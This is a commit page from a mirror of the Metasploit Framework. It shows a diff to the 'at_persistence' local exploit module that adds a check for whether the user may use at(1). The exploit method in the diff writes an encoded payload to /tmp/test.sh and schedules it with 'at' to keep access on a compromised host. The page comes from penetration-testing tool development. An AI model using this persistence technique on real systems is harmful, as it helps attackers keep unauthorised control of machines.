infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Implement check for at_persistence

bug/bundler_fix
Jon Hart 2016-09-13 16:08:49 -07:00
parent c69d65c47e
commit 972db476ef
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 11 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/multi/local/at_persistence.rb
View File

@ -47,14 +47,22 @@ class MetasploitModule < Msf::Exploit::Local
) )
end end
# TODO: find a better way to determine if the user can use at(1). cmd_exec doesn't get us stderr or a return code
def check def check
cmd_exec("ls -l") token = "fail #{Rex::Text.rand_text_alphanumeric(8)}"
if cmd_exec("at -l || echo #{token}") =~ /#{token}/
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Vulnerable
end
end end
def exploit def exploit
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NoAccess, 'User denied cron via at.deny')
end
write_file("/tmp/test.sh", payload.encoded) write_file("/tmp/test.sh", payload.encoded)
print_status(cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")) cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
print_status("Waiting #{datastore['WfsDelay']}sec for execution") print_status("Waiting #{datastore['WfsDelay']}sec for execution")
Rex.sleep(datastore['WfsDelay'].to_i) Rex.sleep(datastore['WfsDelay'].to_i)
end end